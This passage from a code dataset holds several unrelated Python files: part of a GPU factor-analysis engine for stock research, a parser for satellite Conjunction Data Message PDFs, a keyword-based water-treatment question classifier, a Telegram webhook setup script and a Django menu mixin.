None]\n self._column_cache = {}\n self._groups = dict()\n self._dataframe = None\n self._dataframe_index = None\n\n def remove_all_factors(self) -> None:\n self._factors = {}\n\n def to_cuda(self, enable_stream=False) -> None:\n \"\"\"\n Set enable_stream to True allows pipeline branches to calculation simultaneously.\n However, this will lead to more VRAM usage and may affect performance.\n \"\"\"\n self._device = torch.device('cuda')\n self._enable_stream = enable_stream\n self.empty_cache()\n\n def to_cpu(self) -> None:\n self._device = torch.device('cpu')\n self.empty_cache()\n\n def test_lookahead_bias(self, start, end):\n \"\"\"Check all factors, if there are look-ahead bias\"\"\"\n start, end = pd.to_datetime(start, utc=True), pd.to_datetime(end, utc=True)\n # get results\n df_expected = self.run(start, end)\n # modify future data\n dt_index = self._dataframe[start:].index.get_level_values(0).unique()\n mid = int(len(dt_index) / 2)\n mid_left = dt_index[mid-1]\n mid_right = dt_index[mid]\n length = self._dataframe.loc[mid_right:].shape[0]\n for col in self._loader.ohlcv:\n self._dataframe.loc[mid_right:, col] = np.random.randn(length)\n self._column_cache = {}\n # hack to disable reload _dataframe\n max_backwards = max([f.get_total_backwards_() for f in self._factors.values()])\n if self._filter:\n max_backwards = max(max_backwards, self._filter.get_total_backwards_())\n self._last_load = [start, end, max_backwards]\n # check if results are consistent\n df = self.run(start, end)\n # clean\n self.empty_cache()\n\n try:\n pd.testing.assert_frame_equal(df_expected[:mid_left], df[:mid_left])\n except AssertionError:\n raise RuntimeError('A look-ahead bias was detected, please check your factors code')\n return 'No assertion raised.'\n\n def _run(self, start, end, delay_factor):\n if len(self._factors) == 0:\n raise ValueError('Please add at least one factor to engine, then run again.')\n\n delays = {col for col, fct in self._factors.items() if fct.should_delay()}\n if not delay_factor and len(delays) > 0:\n warnings.warn(\"Warning!! 
delay_factor is set to False, \"\n \"but {} factors uses data that is only available \"\n \"after the market is closed.\".format(str(delays)),\n RuntimeWarning)\n delays = {}\n\n # make columns to data factors.\n if self._loader.ohlcv is not None:\n OHLCV.open.inputs = (self._loader.ohlcv[0], self._loader.adjustment_multipliers[0])\n OHLCV.high.inputs = (self._loader.ohlcv[1], self._loader.adjustment_multipliers[0])\n OHLCV.low.inputs = (self._loader.ohlcv[2], self._loader.adjustment_multipliers[0])\n OHLCV.close.inputs = (self._loader.ohlcv[3], self._loader.adjustment_multipliers[0])\n OHLCV.volume.inputs = (self._loader.ohlcv[4], self._loader.adjustment_multipliers[1])\n\n # shift factors if necessary\n filter_ = self._filter\n if filter_ and filter_.should_delay() and delay_factor:\n filter_ = filter_.shift(1)\n factors = {col: col in delays and fct.shift(1) or fct\n for col, fct in self._factors.items()}\n\n # calculate how much historical data is needed\n max_backwards = max([f.get_total_backwards_() for f in factors.values()])\n if filter_:\n max_backwards = max(max_backwards, filter_.get_total_backwards_())\n\n # copy data to tensor\n self._prepare_tensor(start, end, max_backwards)\n\n # clean up before start (may be keyboard interrupted)\n if filter_:\n filter_.clean_up_()\n for f in factors.values():\n f.clean_up_()\n\n # some pre-work\n if filter_:\n filter_.pre_compute_(self, start, end)\n for f in factors.values():\n f.pre_compute_(self, start, end)\n\n # schedule possible gpu work first\n results = {col: self._compute_and_revert(fct, col) for col, fct in factors.items()}\n shifted_mask = None\n if filter_:\n shifted_mask = self._compute_and_revert(filter_, 'filter')\n\n # do clean up again\n if filter_:\n filter_.clean_up_()\n for f in factors.values():\n f.clean_up_()\n\n return results, shifted_mask, len(delays) > 0\n\n def run(self, start: Union[str, pd.Timestamp], end: Union[str, pd.Timestamp],\n delay_factor=True) -> pd.DataFrame:\n \"\"\"\n Compute factors and filters, return a df contains all.\n \"\"\"\n start, end = pd.to_datetime(start, utc=True), pd.to_datetime(end, utc=True)\n\n results, shifted_mask, delayed = self._run(start, end, delay_factor)\n # do cpu work and synchronize will automatically done by torch\n ret = pd.DataFrame(index=self._dataframe.index.copy())\n ret = ret.assign(**{col: t.cpu().numpy() for col, t in results.items()})\n if shifted_mask is not None:\n ret = ret[shifted_mask.cpu().numpy()]\n\n # if any factors delayed, return df also should be delayed\n if delayed:\n index = ret.index.levels[0]\n start_ind = index.get_loc(start, 'bfill')\n if (start_ind + 1) >= len(index):\n raise ValueError('There is no data between start and end.')\n start = index[start_ind + 1]\n return ret.loc[start:]\n\n def run_raw(self, start: Union[str, pd.Timestamp], end: Union[str, pd.Timestamp],\n delay_factor=True) -> Dict[str, torch.Tensor]:\n \"\"\"\n Compute factors and filters, return a dict contains factor_name = torch.Tensor\n \"\"\"\n start, end = pd.to_datetime(start, utc=True), pd.to_datetime(end, utc=True)\n\n results, shifted_mask, delayed = self._run(start, end, delay_factor)\n\n index = self._dataframe.index.levels[0]\n start_ind = index.get_loc(start, 'bfill')\n if delayed: # if any factors delayed, return df also should be delayed\n start_ind += 1\n if start_ind >= len(index):\n raise ValueError('There is no data between start and end.')\n if shifted_mask is not None:\n shifted_mask = shifted_mask[start_ind:]\n results = {k: v[start_ind:][shifted_mask] 
for k, v in results.items()}\n else:\n results = {k: v[start_ind:] for k, v in results.items()}\n return results\n\n def get_factors_raw_value(self):\n stream = None\n if self._device.type == 'cuda':\n stream = torch.cuda.current_stream()\n return {c: f.compute_(stream) for c, f in self._factors.items()}\n\n def get_price_matrix(self,\n start: Union[str, pd.Timestamp],\n end: Union[str, pd.Timestamp],\n prices: ColumnDataFactor = OHLCV.close,\n ) -> pd.DataFrame:\n \"\"\"\n Get the price data for Factor Return Analysis.\n :param start: same as run\n :param end: should be longer than the `end` time of `run`, for forward returns calculations.\n :param prices: prices data factor. If you traded at the opening, you should set it\n to OHLCV.open.\n \"\"\"\n factors_backup = self._factors\n self._factors = {'price': AdjustedColumnDataFactor(prices)}\n\n # get tickers first\n assets = None\n if self._filter is not None:\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n assets_ret = self.run(start, end, delay_factor=False)\n assets = assets_ret.index.get_level_values(1).unique()\n\n filter_backup = self._filter\n self._filter = StaticAssets(assets)\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n ret = self.run(start, end, delay_factor=False)\n self._factors = factors_backup\n self._filter = filter_backup\n\n ret = ret['price'].unstack(level=[1])\n return ret\n\n def plot_chart(self, start, end, trace_types=None, styles=None, delay_factor=True,\n inline=True):\n \"\"\"\n Plotting common stock price chart for researching.\n :param start: same as engine.run()\n :param end: same as engine.run()\n :param delay_factor: same as engine.run()\n :param trace_types: dict(factor_name=plotly_trace_type), default is 'Scatter'\n :param styles: dict(factor_name=plotly_trace_styles)\n :param inline: display plot immediately\n\n Usage::\n\n engine = factors.FactorEngine(loader)\n engine.timezone = 'America/New_York'\n engine.set_filter(factors.StaticAssets({'NVDA', 'MSFT'}))\n engine.add(factors.MA(20), 'MA20')\n engine.add(factors.RSI(), 'RSI')\n engine.to_cuda()\n engine.plot_chart('2017', '2018', styles={\n 'MA20': {\n 'line': {'dash': 'dash'}\n },\n 'RSI': {\n 'yaxis': 'y3',\n 'line': {'width': 1}\n }\n })\n\n \"\"\"\n df = self.run(start, end, delay_factor)\n figs = plot_chart(self._dataframe, self.loader_.ohlcv, df, trace_types=trace_types,\n styles=styles, inline=inline)\n return figs, df\n\n def full_run(self, start, end, trade_at='close', periods=(1, 4, 9),\n quantiles=5, filter_zscore=20, demean=True, preview=True\n ) -> Tuple[pd.DataFrame, pd.DataFrame]:\n \"\"\"\n Return this:\n | \t | \t| Returns | factor_name \t|\n |date\t |asset\t|10D\t |factor\t |factor_quantile\t|\n |---------------------------|-------|-----------|-----------|-------------------|\n |2014-01-08 00:00:00+00:00\t|ARNC\t|0.070159\t|0.215274\t|5 |\n | |BA\t |-0.038556\t|-1.638784\t|1 |\n For alphalens analysis, you can use this:\n factor_data = full_run_return[['factor_name', 'Returns']].droplevel(0, axis=1)\n al.tears.create_returns_tear_sheet(factor_data)\n :param str, pd.Timestamp start: Factor analysis start time\n :param str, pd.Timestamp end: Factor analysis end time\n :param trade_at: Which price for forward returns. 
'open', or 'close.\n If is 'current_close', same as run engine with delay_factor=False,\n Be sure that no any high,low,close data is used in factor, otherwise will\n cause lookahead bias.\n :param periods: Forward return periods\n :param quantiles: Number of quantile\n :param filter_zscore: Drop extreme factor return, for stability of the analysis.\n :param demean: Whether the factor is converted into a hedged weight: sum(weight) = 0\n :param preview: Display a preview chart of the result\n \"\"\"\n factors = self._factors.copy()\n universe = self.get_filter()\n\n column_names = {}\n # add quantile factor of all factors\n for c, f in factors.items():\n self.add(f.quantile(quantiles, mask=universe), c + '_q_')\n self.add(f.to_weight(mask=universe, demean=demean), c + '_w_')\n column_names[c] = (c, 'factor')\n column_names[c + '_q_'] = (c, 'factor_quantile')\n column_names[c + '_w_'] = (c, 'factor_weight')\n\n # add the rolling returns of each period, use AdjustedColumnDataFactor for best performance\n shift = -1\n inputs = (AdjustedColumnDataFactor(OHLCV.close),)\n if trade_at == 'open':\n inputs = (AdjustedColumnDataFactor(OHLCV.open),)\n elif trade_at == 'current_close':\n shift = 0\n from .basic import Returns\n for n in periods:\n # Different: returns here diff by bar, which alphalens diff by time\n ret = Returns(win=n + 1, inputs=inputs).shift(-n + shift)\n mask = universe\n if filter_zscore is not None:\n # Different: The zscore here contains all backward data which alphalens not counted.\n zscore_factor = ret.zscore(groupby='asset', mask=universe)\n zscore_filter = zscore_factor.abs() <= filter_zscore\n if mask is not None:\n mask = mask & zscore_filter\n else:\n mask = zscore_filter\n self.add(ret.filter(mask), str(n) + '_r_')\n else:\n self.add(ret, str(n) + '_r_')\n self.add(ret.demean(mask=mask), str(n) + '_d_')\n\n # run and get df\n factor_data = self.run(start, end, trade_at != 'current_close')\n self._factors = factors\n factor_data.index = factor_data.index.remove_unused_levels()\n # factor_data.sort_index(inplace=True) # 140 ms\n assert len(factor_data.index.levels[0]) > max(periods) - shift, \\\n 'No enough data for forward returns, please expand the end date'\n last_date = factor_data.index.levels[0][-max(periods) + shift - 1]\n factor_data = factor_data.loc[:last_date]\n\n # infer freq\n delta = min(factor_data.index.levels[0][1:] - factor_data.index.levels[0][:-1])\n unit = delta.resolution_string\n freq = int(delta / pd.Timedelta(1, unit))\n # change columns name\n period_cols = {n: str(n * freq) + unit for n in periods}\n for n, period_col in period_cols.items():\n column_names[str(n) + '_r_'] = ('Returns', period_col)\n column_names[str(n) + '_d_'] = ('Demeaned', period_col)\n new_cols = pd.MultiIndex.from_tuples([column_names[c] for c in factor_data.columns])\n factor_data.columns = new_cols\n factor_data.sort_index(axis=1, inplace=True)\n\n # mean return, return std err\n mean_return = pd.DataFrame(columns=pd.MultiIndex.from_arrays([[], []]))\n for fact_name, _ in factors.items():\n group = [(fact_name, 'factor_quantile'), 'date']\n grouped_mean = factor_data[['Demeaned', fact_name]].groupby(group).agg('mean')\n for n, period_col in period_cols.items():\n demean_col = ('Demeaned', period_col)\n mean_col = (fact_name, period_col)\n mean_return[mean_col] = grouped_mean[demean_col]\n mean_return.index.set_names('quantile', level=0)\n mean_return = mean_return.groupby(level=0).agg(['mean', 'sem'])\n mean_return.sort_index(axis=1, inplace=True)\n\n # plot\n if 
preview:\n plot_quantile_and_cumulative_returns(factor_data, mean_return)\n\n return factor_data, mean_return\n","repo_name":"Heerozh/spectre","sub_path":"spectre/factors/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":23232,"program_lang":"python","lang":"en","doc_type":"code","stars":479,"dataset":"github-code","pt":"53"}
+{"seq_id":"13059378417","text":"\"\"\"CDM module.\n\nThis module loads CDMS either from a .pdf-file or from the SQL database.\n\nExample\n-------\n\nNotes\n-----\n\nAttributes\n----------\n\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport fitz # this is pymupdf\nfrom datetime import datetime, timezone\nimport mysql.connector as sql\nfrom sqlalchemy import create_engine\nfrom astropy import units as u\n\n\nclass CDM:\n \"\"\"\n A Conjunction Data Message.\n Further information: https://public.ccsds.org/Pubs/508x0b1e2c2.pdf\n \"\"\"\n\n\n def __init__(self):\n \"\"\"\n \n \"\"\"\n # self.objectA = SatObject(\"ObjectA\")\n # self.objectB = SatObject(\"ObjectB\")\n \n\n def load_cdm_from_pdf(self, filename):\n \"\"\"\n Loads a CDM from a .pdf file.\n \"\"\"\n doc = fitz.open(filename) # open document\n for page in doc: # iterate the document pages\n text = str(page.get_text().encode(\"utf8\")) # get plain text (is in UTF-8)\n # TODO: add test for more than one pdf page\n \n lines = text.split('\\\\n')\n\n self.generation_date = datetime.strptime(lines[2].rpartition(\": \")[2].replace(\" \",\"\"),'%Y/%m/%d%H:%M').replace(tzinfo=timezone.utc)\n # print(generation_date)\n\n self.ccsds_cdm_vers = lines[5].rpartition(\":\")[2].strip()\n # print(ccsds_cdm_vers)\n self.creation_date = datetime.strptime(lines[6].rpartition(\": \")[2].replace(\" \",\"\"),'%Y/%m/%d%H:%M:%S').replace(tzinfo=timezone.utc)\n # print(creation_date)\n self.originator = lines[7].rpartition(\":\")[2].strip()\n # print(originator)\n self.message_for = lines[8].rpartition(\":\")[2].strip()\n # print(message_for)\n self.message_id = lines[9].rpartition(\":\")[2].strip()\n # print(message_id)\n\n self.tca = datetime.strptime(lines[11].split(\": \")[1].replace(\" \",\"\"),'%Y/%m/%d%H:%M:%S.%f').replace(tzinfo=timezone.utc)\n # print(tca)\n self.miss_distance = float(lines[12].split(\": \")[1].strip())\n # print(miss_distance)\n self.relative_speed = float(lines[13].split(\": \")[1].strip())\n # print(relative_speed)\n rel_position_R = float(lines[14].split(\": \")[1].strip())\n # print(relative_position_R)\n rel_position_T = float(lines[15].split(\": \")[1].strip())\n # print(relative_position_T)\n rel_position_N = float(lines[16].split(\": \")[1].strip())\n # print(relative_position_N)\n self.rel_position_RTN = np.array([[rel_position_R],[rel_position_T],[rel_position_N]])\n self.collision_prob = float(lines[17].split(\": \")[1].strip())\n # print(collision_prob)\n self.collision_prob_method = lines[18].split(\": \")[1].strip()\n # print(collision_prob_method)\n\n line = lines[22].split(\": \")[1].strip().split(\" \")\n self.object_designator = [x for x in line if x]\n # print(object_designator)\n line = lines[23].split(\": \")[1].strip().split(\" \")\n self.object_name = [x for x in line if x]\n # print(object_name)\n line = lines[24].split(\": \")[1].strip().split(\" \")\n self.itn_designator = [x for x in line if x]\n # print(itn_designator)\n line = lines[25].split(\": \")[1].strip().split(\" \")\n self.object_type = [x for x in line if x]\n # print(object_type)\n line = lines[26].split(\": \")[1].strip().split(\" \")\n self.operator_organization = [x for x in line if x]\n # print(operator_organization)\n line = lines[27].split(\": \")[1].strip().split(\" \")\n self.ephemeris_name = [x for x in line if x]\n # print(ephemeris_name)\n line = lines[28].split(\": \")[1].strip().split(\" \")\n self.maneuverable = [x for x in line if x]\n # print(maneuverable)\n line = lines[29].split(\": \")[1].strip().split(\" \")\n 
self.ref_frame = [x for x in line if x]\n # print(ref_frame)\n line = lines[30].split(\" : \")[1].strip().split(\" \")\n self.gravity_model = [x for x in line if x]\n # print(gravity_model)\n line = lines[31].split(\": \")[1].strip().split(\" \")\n self.atmospheric_model = [x for x in line if x]\n # print(atmospheric_model)\n line = lines[32].split(\": \")[1].strip().split(\" \")\n self.n_body_perturbations = [x for x in line if x]\n # print(n_body_perturbations)\n line = lines[33].split(\": \")[1].strip().split(\" \")\n self.solar_rad_pressure = [x for x in line if x]\n # print(solar_rad_pressure)\n line = lines[34].split(\": \")[1].strip().split(\" \")\n self.earth_tides = [x for x in line if x]\n # print(earth_tides)\n line = lines[35].split(\": \")[1].strip().split(\" \")\n self.intrack_thrust = [x for x in line if x]\n # print(intrack_thrust)\n line = lines[36].split(\": \")[1].strip().split(\" \")\n line = [x for x in line if x]\n self.time_lastob_sta = []\n self.time_lastob_sta.append(datetime.strptime(line[0].replace(\" \",\"\"),'%Y/%m/%d%H:%M:%S.%f').replace(tzinfo=timezone.utc))\n self.time_lastob_sta.append(datetime.strptime(line[1].replace(\" \",\"\"),'%Y/%m/%d%H:%M:%S.%f').replace(tzinfo=timezone.utc))\n # print(time_lastob_sta)\n line = lines[37].split(\": \")[1].strip().split(\" \")\n line = [x for x in line if x]\n self.time_lastob_end = []\n self.time_lastob_end.append(datetime.strptime(line[0].replace(\" \",\"\"),'%Y/%m/%d%H:%M:%S.%f').replace(tzinfo=timezone.utc))\n self.time_lastob_end.append(datetime.strptime(line[1].replace(\" \",\"\"),'%Y/%m/%d%H:%M:%S.%f').replace(tzinfo=timezone.utc))\n # print(time_lastob_end)\n line = lines[38].split(\": \")[1].strip().split(\" \")\n self.rec_od_span = [float(x) for x in line if x]\n # print(rec_od_span)\n line = lines[39].split(\": \")[1].strip().split(\" \")\n self.actual_od_span = [float(x) for x in line if x]\n # print(actual_od_span)\n line = lines[40].split(\": \")[1].strip().split(\" \")\n self.obs_available = [float(x) for x in line if x]\n # print(obs_available)\n line = lines[41].split(\": \")[1].strip().split(\" \")\n self.obs_used = [float(x) for x in line if x]\n # print(obs_used)\n line = lines[42].split(\": \")[1].strip().split(\" \")\n self.residuals_accepted = [float(x) for x in line if x]\n # print(residuals_accepted)\n line = lines[43].split(\": \")[1].strip().split(\" \")\n self.weighted_rms = [float(x) for x in line if x]\n # print(weighted_rms)\n line = lines[44].split(\": \")[1].strip().split(\" \")\n self.area_pc = [float(x) for x in line if x]\n # print(area_pc)\n line = lines[45].split(\": \")[1].strip().split(\" \")\n self.area_drag = [float(x) for x in line if x]\n # print(area_drag)\n line = lines[46].split(\": \")[1].strip().split(\" \")\n self.area_srp = [float(x) for x in line if x]\n # print(area_srp)\n line = lines[47].split(\": \")[1].strip().split(\" \")\n self.mass = [float(x) for x in line if x]\n # print(mass)\n line = lines[48].split(\": \")[1].strip().split(\" \")\n self.cd_am = [float(x) for x in line if x]\n # print(cd_am)\n line = lines[49].split(\": \")[1].strip().split(\" \")\n self.cr_am = [float(x) for x in line if x]\n # print(cr_am)\n line = lines[50].split(\": \")[1].strip().split(\" \")\n self.thrust_acc = [float(x) for x in line if x]\n # print(thrust_acc)\n line = lines[51].split(\": \")[1].strip().split(\" \")\n self.sedr = [float(x) for x in line if x]\n # print(sedr)\n line = lines[52].split(\": \")[1].strip().split(\" \")\n X = [float(x) for x in line if x]\n # print(X)\n 
line = lines[53].split(\": \")[1].strip().split(\" \")\n Y = [float(x) for x in line if x]\n # print(Y)\n line = lines[54].split(\": \")[1].strip().split(\" \")\n Z = [float(x) for x in line if x]\n # print(Z)\n self.position_XYZ = np.array([X,Y,Z])\n line = lines[55].split(\": \")[1].strip().split(\" \")\n X_dot = [float(x) for x in line if x]\n # print(X_dot)\n line = lines[56].split(\": \")[1].strip().split(\" \")\n Y_dot = [float(x) for x in line if x]\n # print(Y_dot)\n line = lines[57].split(\": \")[1].strip().split(\" \")\n Z_dot = [float(x) for x in line if x]\n # print(Z_dot)\n self.position_dot_XYZ = np.array([X_dot,Y_dot,Z_dot])\n\n line = lines[59].split(\": \")[1].strip().split(\" \")\n self.apogee = [float(x) for x in line if x]\n # print(apogee)\n line = lines[60].split(\": \")[1].strip().split(\" \")\n self.perigee = [float(x) for x in line if x]\n # print(perigee)\n line = lines[61].split(\": \")[1].strip().split(\" \")\n self.eccentricity = [float(x) for x in line if x]\n # print(eccentricity)\n line = lines[62].split(\": \")[1].strip().split(\" \")\n self.inclination = [float(x) for x in line if x]\n # print(inclination)\n\n line = lines[64].split(\": \")[1].strip().split()\n self.RTN_1sigma = [float(x) for x in line if x]\n # print(RTN_1sigma)\n\n line = lines[66].split(\": \")[1].strip().split()\n RTN_covariance_temp = [float(x) for x in line if x]\n line = lines[67].strip().split()\n RTN_covariance_temp.append([float(x) for x in line if x])\n line = lines[68].strip().split()\n RTN_covariance_temp.append([float(x) for x in line if x])\n self.RTN_covariance = np.zeros((3,3,2))\n self.RTN_covariance[:,:,0] = np.array([ [RTN_covariance_temp[0],RTN_covariance_temp[2][0],RTN_covariance_temp[3][0]],\n [RTN_covariance_temp[2][0],RTN_covariance_temp[2][1],RTN_covariance_temp[3][1]],\n [RTN_covariance_temp[3][0],RTN_covariance_temp[3][1],RTN_covariance_temp[3][2] ] ])\n self.RTN_covariance[:,:,1] = np.array([ [RTN_covariance_temp[1],RTN_covariance_temp[2][2],RTN_covariance_temp[3][3]],\n [RTN_covariance_temp[2][2],RTN_covariance_temp[2][3],RTN_covariance_temp[3][4]],\n [RTN_covariance_temp[3][3],RTN_covariance_temp[3][4],RTN_covariance_temp[3][5] ] ] )\n","repo_name":"fabrizioturco/CAM_aerodynamic_drag","sub_path":"collisionAvoidanceAnalysis/conjunction_data_message.py","file_name":"conjunction_data_message.py","file_ext":"py","file_size_in_byte":10290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
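The last block above rebuilds a symmetric 3x3 RTN covariance matrix (once per epoch) from the lower-triangular rows spread across report lines 66-68. The same construction in isolation, as a minimal sketch assuming the six entries arrive in the order RR, TR, TT, NR, NT, NN:

    import numpy as np

    def rtn_from_lower_triangle(vals):
        # vals: [RR, TR, TT, NR, NT, NN] -- one epoch's lower-triangular entries
        rr, tr, tt, nr, nt, nn = vals
        return np.array([[rr, tr, nr],
                         [tr, tt, nt],
                         [nr, nt, nn]])

    cov = rtn_from_lower_triangle([1.0, 0.1, 2.0, 0.2, 0.3, 3.0])
    assert np.allclose(cov, cov.T)  # symmetric by construction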
+{"seq_id":"8116048695","text":"#-*- coding : utf-8 -*-\n# coding: utf-8\n\n\nimport os\nimport ahocorasick\n\nclass QuestionClassifier:\n def __init__(self):\n cur_dir = '/'.join(os.path.abspath(__file__).split('/')[:-1])\n # 特征词路径\n self.project_path = os.path.join(cur_dir, 'dict/project.txt')\n self.unit_path = os.path.join(cur_dir, 'dict/unit.txt')\n self.deny_path = os.path.join(cur_dir, 'dict/deny.txt')\n\n # 加载特征词\n self.project_wds= [i.strip() for i in open(self.project_path) if i.strip()]#encoding=\"utf-8\"\n self.unit_wds= [i.strip() for i in open(self.unit_path) if i.strip()]\n\n self.region_words = set(self.project_wds + self.unit_wds)\n # deny是一个反义词的合集,单独由人工列出\n self.deny_words = [i.strip() for i in open(self.deny_path,encoding=\"utf-8\") if i.strip()]\n # 构造领域actree,ac多模式匹配算法里的方法\n self.region_tree = self.build_actree(list(self.region_words))\n # 构建关键词与对应类型的词典\n self.wdtype_dict = self.build_wdtype_dict() #格式为[{'项目或单元名':'project或unit'},{'项目或单元名':'project或unit'},{数:'quantity'}……]\n\n\n\n # 工艺参数单位词,人工列出\n self.Qunit_qwds = ['吨/天', '吨每天', 'CMD', 't/d', 'tph', 't/h', 'm3/h', '吨每小时']\n self.Recovunit_qwds = ['%']\n self.CODunit_qwds = ['mg', 'mg/L', 'mg/l', 'ppm']\n self.CIunit_qwds = ['Us', 'us', 'us/cm', 'ms', 'Ms', 'ms/cm']\n self.Hardunit_qwds = ['mg', 'mg/L', 'mg/l', 'ppm']\n self.SSunit_qwds = ['mg', 'mg/L', 'mg/l', 'ppm']\n\n\n\n\n # 问句疑问词,人工列出\n self.process_qwds = ['哪些工艺单元','工艺单元有哪些','什么工艺', '什么流程', '什么工艺流程','哪些工艺','工艺有哪些', '哪些流程', '哪些工艺流程','哪种工艺', '哪种流程', '哪种工艺流程','工艺是什么','工艺流程是什么']\n self.project_qwds = ['什么项目', '什么工程', '哪个项目', '哪个工程','项目有哪些','有哪些项目']\n self.unit_qwds = ['什么设备', '什么单元', '哪个设备', '哪个单元']\n\n\n\n\n\n\n print('model init finished ......') #以上是输入问答模型的基础数据\n\n return\n\n '''分类主函数'''\n def classify(self, question):\n data = {}\n project_dict = self.check_project(question) #check_project:用wdtype_dict进行问句过滤,最终构建成一个符合问句的关键词和关键词类型的字典\n if not project_dict:\n return {}\n data['args'] = project_dict # 将关键词和关键词类型的字典输入一个更大的字典data,这里面存储了问题中提到了哪些节点\n #收集问句当中所涉及到的实体类型\n types = []\n for type_ in project_dict.values(): # 将关键词类型的存储为type\n types += type_\n question_type = 'others'\n\n question_types = []\n\n ## 目标解决以下问题\n # 1 知道项目名称查工艺\n # 2 知道某个工艺查哪个项目用了这个工艺\n # 3 知道进出水的水量、水质、回收率的一个或几个参数查工艺\n # 4 知道某个单元的进水或出水工艺参数名称查项目名称\n # 5 查询某个单元的最高、最低、平均进水或出水工艺参数(附加)\n # 6 知道工艺参数的范围或不与数据库完全匹配的值,进行工艺流程模糊匹配(目标)\n\n # 1 知道项目名称查工艺\n # 如果问句中包含流程查询且明确的项目名称在查询语句中,如:\n # 蒙西污水处理厂的工艺是什么……日铭三期回用水用了哪些工艺……泰州可利放流回用水包含哪些工艺\n if self.check_words(self.process_qwds, question) and ('project' in types):\n question_type = 'project_unit'\n question_types.append(question_type)\n\n # 2 知道某个工艺查哪个项目用了这个工艺\n # 如果问句中包含项目查询且明确的某个单元名称在查询语句中,如:\n # 用了一级二段反渗透的项目有哪些……用自清洗过滤器的有哪些项目……什么项目用了浸没式超滤\n if self.check_words(self.project_qwds, question) and ('unit' in types):\n question_type = 'unit_project'\n question_types.append(question_type)\n\n # # 6 知道工艺参数的范围或不与数据库完全匹配的值,进行工艺流程模糊匹配(目标)\n # if self.check_words(self.project_qwds, question) and ('unit' in types):\n # question_type = 'wquality_process'\n # question_types.append(question_type)\n #\n\n # 将多个分类结果进行合并处理,组装成一个字典\n data['question_types'] = question_types\n\n\n return data\n\n '''筛选出构造词对应的类型,也就是够造'args'后面的内容'''\n def build_wdtype_dict(self):\n wd_dict = dict()\n for wd in self.region_words:\n wd_dict[wd] = []\n if wd in self.project_wds:\n wd_dict[wd].append('project')\n if wd in self.unit_wds:\n wd_dict[wd].append('unit')\n\n return wd_dict\n #wd_dict格式为[{'项目或单元名':'project或unit'},{'项目或单元名':'project或unit'},{数:'quantity'}……]\n ## 格式或为{}\n\n '''构造actree,加速过滤'''\n def 
build_actree(self, wordlist):\n actree = ahocorasick.Automaton()\n for index, word in enumerate(wordlist):\n actree.add_word(word, (index, word))\n actree.make_automaton()\n return actree\n\n '''问句过滤从wdtype_dict中过滤出符合question的关键词和关键词类型的字典'''\n def check_project(self, question):\n region_wds = []\n for i in self.region_tree.iter(question):\n wd = i[1][1]\n region_wds.append(wd)\n stop_wds = []\n for wd1 in region_wds:\n for wd2 in region_wds:\n if wd1 in wd2 and wd1 != wd2:\n stop_wds.append(wd1)\n final_wds = [i for i in region_wds if i not in stop_wds]\n final_dict = {i:self.wdtype_dict.get(i) for i in final_wds}\n\n return final_dict\n\n '''基于特征词进行分类'''\n def check_words(self, wds, sent):\n for wd in wds:\n if wd in sent:\n return True\n return False\n\n\nif __name__ == '__main__':\n handler = QuestionClassifier()\n while 1:\n question = input('input an question:')\n data = handler.classify(question)\n print(data)","repo_name":"cooperck/QA_ReuseWater_KG","sub_path":"ruw_question_classifier.py","file_name":"ruw_question_classifier.py","file_ext":"py","file_size_in_byte":6751,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
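The comments above describe the core trick of check_project: an Aho-Corasick automaton (the pyahocorasick package) finds every vocabulary word inside the question, and matches that are substrings of longer matches are then dropped. A minimal sketch of that filtering step, using terms taken from the comments above:

    import ahocorasick

    words = ["反渗透", "一级二段反渗透", "超滤"]  # sample domain vocabulary
    tree = ahocorasick.Automaton()
    for idx, w in enumerate(words):
        tree.add_word(w, (idx, w))
    tree.make_automaton()

    question = "用了一级二段反渗透的项目有哪些"  # "which projects used two-stage RO"
    hits = [val[1] for _, val in tree.iter(question)]
    # keep only matches that are not substrings of another match
    final = [w for w in hits if not any(w != other and w in other for other in hits)]
    print(final)  # ['一级二段反渗透']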
+{"seq_id":"1170301963","text":"import telegram\n\nprint(\"provide token\")\ntoken = input()\nprint(\"provide webhook url (or no to use existing)\")\nurl = input()\n\nbot = telegram.Bot(token=token)\n\nif url == \"no\":\n url = bot.get_webhook_info()['url']\n\n\nbot.set_webhook(url, allowed_updates=[\"new_chat_members\"]) and print(\"Successfully updated\")\n","repo_name":"MehmetErkcn/VenusWelcomeBot","sub_path":"external_utilities/set_webhook.py","file_name":"set_webhook.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"22026374950","text":"from django.db.models import Count\n\nfrom .models import *\n\nmenu = [{'title': \"О нас\", 'url_name': 'about'},\n {'title': \"Обратная связь\", 'url_name': 'contact'},\n {'title': \"Добавить услугу\", 'url_name': 'add_page'},\n ]\n\n\nclass DataMixin:\n paginate_by = 10\n\n def get_user_context(self, **kwargs):\n context = kwargs\n cats = Category.objects.annotate(Count('service'))\n\n user_menu = menu.copy()\n if not self.request.user.is_superuser:\n user_menu.pop(2)\n\n context['menu'] = user_menu\n\n context['cats'] = cats # tag для html\n if 'cat_selected' not in context:\n context['cat_selected'] = 0\n return context\n","repo_name":"VDK45/AvtoAvtoStandart","sub_path":"avtosite/avto_tochka/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
